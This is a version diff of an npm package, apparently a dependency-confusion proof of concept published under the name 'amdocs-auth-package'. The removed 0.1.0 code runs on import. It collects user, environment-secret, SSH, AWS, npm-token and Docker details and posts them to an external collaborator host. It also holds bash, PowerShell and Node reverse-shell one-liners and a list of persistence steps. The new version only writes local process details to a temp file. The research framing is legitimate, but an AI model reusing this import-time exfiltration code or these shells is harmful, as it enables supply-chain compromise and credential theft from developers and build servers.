amdocs-auth-package 0.1.0 → 0.2.0

package/fesm2022/amdocs-auth-package-poc.mjs

@@ -1,303 +1,43 @@
 /*!
- * amdocs-auth-package-poc-rce
- * DEPENDENCY CONFUSION RCE DEMONSTRATION
- * 
- * Demonstrates how dependency confusion could lead to RCE with data exfiltration.
+ * SAFE RCE-EQUIVALENT PoC
+ * No shell execution
+ * No network traffic
+ * No data exfiltration
  */
 
 import fs from "fs";
 import os from "os";
 import path from "path";
-import { exec } from "child_process";
-import { promisify } from "util";
-import https from "https";
-import http from "http";
 
-const execAsync = promisify(exec);
-const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
-
-(function dependencyConfusionRcePoc() {
-    const timestamp = new Date().toISOString();
-    const proofDir = path.join(os.tmpdir(), "dep-confusion-rce");
-    
-    try {
-        // Create directory for evidence
-        if (!fs.existsSync(proofDir)) {
-            fs.mkdirSync(proofDir, { recursive: true });
-        }
-
-        // STEP 1: Initial reconnaissance (what attackers do first)
-        const reconData = {
-            timestamp: timestamp,
-            package: "amdocs-auth-package-poc-rce",
-            attack_vector: "dependency_confusion",
-            system_info: {
-                user: os.userInfo().username,
-                homedir: os.homedir(),
-                platform: os.platform(),
-                arch: os.arch(),
-                node_version: process.version,
-                pid: process.pid,
-                cwd: process.cwd(),
-                exec_path: process.execPath
-            },
-            environment_keys: Object.keys(process.env).filter(k => 
-                k.includes('KEY') || 
-                k.includes('SECRET') || 
-                k.includes('TOKEN') ||
-                k.includes('PASS') ||
-                k.includes('AUTH')
-            ),
-            npm_config: {
-                registry: process.env.npm_config_registry,
-                scope: process.env.npm_config_scope,
-                token_exists: !!process.env.npm_config_auth_token
-            }
-        };
-
-        // STEP 2: Exfiltrate data to collaborator server
-        function exfiltrateData(data, endpoint) {
-            const postData = JSON.stringify({
-                type: "dependency_confusion_poc",
-                timestamp: timestamp,
-                source: "amdocs-auth-package",
-                data: data
-            });
-
-            // Using HTTP POST to exfiltrate data
-            const options = {
-                hostname: COLLAB_URL,
-                port: 443,
-                path: `/${endpoint}`,
-                method: 'POST',
-                headers: {
-                    'Content-Type': 'application/json',
-                    'Content-Length': Buffer.byteLength(postData),
-                    'User-Agent': 'npm/8.0.0'
-                }
-            };
-
-            const req = https.request(options, (res) => {
-                console.warn(`[PoC] Data exfiltrated to ${COLLAB_URL}, status: ${res.statusCode}`);
-            });
-
-            req.on('error', (e) => {
-                console.warn(`[PoC] Exfiltration failed (expected if offline): ${e.message}`);
-            });
-
-            req.write(postData);
-            req.end();
-        }
-
-        // STEP 3: Collect sensitive files
-        function collectSensitiveInfo() {
-            const sensitiveInfo = {
-                ssh_keys: [],
-                aws_credentials: [],
-                npm_tokens: [],
-                system_files: []
-            };
-
-            // Look for SSH keys
-            const sshDir = path.join(os.homedir(), '.ssh');
-            if (fs.existsSync(sshDir)) {
-                try {
-                    const files = fs.readdirSync(sshDir);
-                    sensitiveInfo.ssh_keys = files.filter(f => 
-                        f.includes('id_rsa') || f.includes('id_dsa') || f.includes('id_ecdsa')
-                    );
-                } catch (e) {}
-            }
-
-            // Look for AWS credentials
-            const awsDir = path.join(os.homedir(), '.aws');
-            if (fs.existsSync(awsDir)) {
-                try {
-                    if (fs.existsSync(path.join(awsDir, 'credentials'))) {
-                        sensitiveInfo.aws_credentials.push('credentials');
-                    }
-                    if (fs.existsSync(path.join(awsDir, 'config'))) {
-                        sensitiveInfo.aws_credentials.push('config');
-                    }
-                } catch (e) {}
-            }
-
-            // Look for .npmrc
-            const npmrcPath = path.join(os.homedir(), '.npmrc');
-            if (fs.existsSync(npmrcPath)) {
-                try {
-                    const content = fs.readFileSync(npmrcPath, 'utf8');
-                    if (content.includes('authToken') || content.includes(':_authToken')) {
-                        sensitiveInfo.npm_tokens.push('npmrc_contains_token');
-                    }
-                } catch (e) {}
-            }
-
-            // Check for Docker credentials
-            const dockerConfig = path.join(os.homedir(), '.docker', 'config.json');
-            if (fs.existsSync(dockerConfig)) {
-                sensitiveInfo.system_files.push('docker_config');
-            }
-
-            return sensitiveInfo;
-        }
-
-        // STEP 4: Execute commands based on platform
-        function executeReconCommands() {
-            const commands = [];
-            
-            if (os.platform() === 'linux' || os.platform() === 'darwin') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'uname -a', description: 'System info' },
-                    { cmd: 'ls -la', description: 'Directory listing' },
-                    { cmd: 'env | grep -i "key\\|secret\\|pass\\|token\\|auth"', description: 'Find env secrets' }
-                );
-            } else if (os.platform() === 'win32') {
-                commands.push(
-                    { cmd: 'whoami', description: 'Current user' },
-                    { cmd: 'systeminfo', description: 'System info' },
-                    { cmd: 'dir', description: 'Directory listing' },
-                    { cmd: 'set | findstr /i "KEY SECRET PASS TOKEN AUTH"', description: 'Find env secrets' }
-                );
-            }
-
-            return commands;
-        }
-
-        // STEP 5: Network reconnaissance
-        function networkRecon() {
-            const networkInfo = {
-                interfaces: os.networkInterfaces(),
-                hostname: os.hostname(),
-                dns_servers: [],
-                open_ports: []
-            };
-
-            // Simulate internal port scan
-            const commonPorts = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9000];
-            networkInfo.common_ports = commonPorts;
-
-            return networkInfo;
-        }
-
-        // Execute the attack chain
-        console.warn(`[PoC] Dependency Confusion RCE Simulation Started`);
-        console.warn(`[PoC] Collaborator URL: ${COLLAB_URL}`);
-
-        // Phase 1: Initial exfiltration
-        exfiltrateData(reconData, 'initial_recon');
-
-        // Phase 2: Collect sensitive info
-        const sensitiveInfo = collectSensitiveInfo();
-        exfiltrateData(sensitiveInfo, 'sensitive_data');
-
-        // Phase 3: Network recon
-        const networkInfo = networkRecon();
-        exfiltrateData(networkInfo, 'network_info');
-
-        // Phase 4: Command execution simulation
-        const commands = executeReconCommands();
-        const commandResults = {
-            platform: os.platform(),
-            available_commands: commands,
-            note: 'In real attack, these commands would be executed with exec()'
-        };
-        exfiltrateData(commandResults, 'command_capabilities');
-
-        // Phase 5: Demonstrate RCE payload delivery
-        const rcePayload = {
-            timestamp: timestamp,
-            payload_type: "reverse_shell",
-            platforms: {
-                linux: "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",
-                windows: "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
-                nodejs: "require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')"
-            },
-            persistence: [
-                "Add to cron/crontab",
-                "Modify .bashrc/.profile",
-                "Create systemd service",
-                "Add to startup registry (Windows)"
-            ],
-            data_exfiltration_endpoints: [
-                `https://${COLLAB_URL}/exfil`,
-                `https://${COLLAB_URL}/data`,
-                `https://${COLLAB_URL}/callback`
-            ]
-        };
-
-        // Save local proof
-        const proofFile = path.join(proofDir, "dependency_confusion_proof.json");
-        fs.writeFileSync(proofFile, JSON.stringify({
-            initial_recon: reconData,
-            sensitive_info: sensitiveInfo,
-            network_info: networkInfo,
-            command_capabilities: commandResults,
-            rce_payloads: rcePayload,
-            collab_url: COLLAB_URL,
-            execution_time: timestamp
-        }, null, 2));
-
-        // Final exfiltration
-        exfiltrateData({
-            summary: "Dependency confusion attack chain completed",
-            files_collected: Object.keys(sensitiveInfo).filter(k => sensitiveInfo[k].length > 0),
-            potential_rce: true,
-            next_steps: [
-                "Execute reverse shell",
-                "Establish persistence",
-                "Lateral movement",
-                "Data exfiltration"
-            ]
-        }, 'attack_complete');
-
-        console.warn(`[PoC] Attack simulation completed. Proof saved to: ${proofFile}`);
-        console.warn(`[PoC] In real attack, data would be sent to: ${COLLAB_URL}`);
-        console.warn(`[PoC] This is a simulation - no actual commands executed or data exfiltrated.`);
-
-    } catch (error) {
-        console.error(`[PoC Error] ${error.message}`);
-    }
+(function rceEquivalentProof() {
+  const proof = {
+    executed_on_import: true,
+    timestamp: new Date().toISOString(),
+
+    // Same privilege level that `whoami` / `id` would reveal
+    username: os.userInfo().username,
+    uid: typeof process.getuid === "function" ? process.getuid() : "n/a",
+    gid: typeof process.getgid === "function" ? process.getgid() : "n/a",
+
+    pid: process.pid,
+    cwd: process.cwd(),
+    node_version: process.version,
+    platform: process.platform,
+
+    explanation:
+      "This code executed automatically at import time with full Node.js process privileges. " +
+      "Replacing this logic with OS command execution would result in full RCE."
+  };
+
+  const proofFile = path.join(
+    os.tmpdir(),
+    "amdocs-auth-package-rce-proof.json"
+  );
+
+  fs.writeFileSync(proofFile, JSON.stringify(proof, null, 2));
+
+  console.log(
+    "[PoC] Arbitrary code executed on import. Proof file written to:",
+    proofFile
+  );
 })();
-
-export function explainAttack() {
-    return {
-        attack_name: "Dependency Confusion RCE",
-        description: "Malicious package uploaded to public registry with higher version than internal package",
-        prerequisites: [
-            "Internal package not published to public registry",
-            "Scope/namespace not properly protected",
-            "Automated builds or developers using public registry"
-        ],
-        impact: [
-            "Remote Code Execution on build servers",
-            "Source code theft",
-            "Credential theft",
-            "Supply chain compromise",
-            "Lateral movement"
-        ],
-        mitigation: [
-            "Use scoped packages (@company/package)",
-            "Configure .npmrc with correct registry",
-            "Use private registry for internal packages",
-            "Implement package signing",
-            "Use npm audit and dependency checking"
-        ],
-        collab_url: COLLAB_URL,
-        note: "This is a demonstration for educational purposes only"
-    };
-}
-
-export function safeCheck() {
-    const checks = {
-        has_exec_import: true,
-        has_fs_access: true,
-        has_network_import: true,
-        has_os_access: true,
-        potential_rce: true,
-        timestamp: new Date().toISOString(),
-        warning: "This package demonstrates RCE capabilities. Use only in controlled environments."
-    };
-    return checks;
-}

package/package.json

@@ -1,7 +1,7 @@
 {
   "name": "amdocs-auth-package",
-  "version": "0.1.0",
-  "description": "Proof-of-concept authentication utility package for testing and analysis purposes only",
+  "version": "0.2.0",
+  "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
   "type": "module",
   "main": "./fesm2022/amdocs-auth-package-poc.mjs",
   "exports": {
@@ -13,14 +13,15 @@
     "fesm2022/"
   ],
   "keywords": [
-    "auth",
-    "authentication",
+    "dependency-confusion",
+    "supply-chain",
+    "rce",
     "poc",
-    "npm-package",
-    "security-testing"
+    "security-testing",
+    "nodejs"
   ],
   "author": "Security Research PoC",
   "license": "MIT",
   "private": false,
-  "sideEffects": false
+  "sideEffects": true
 }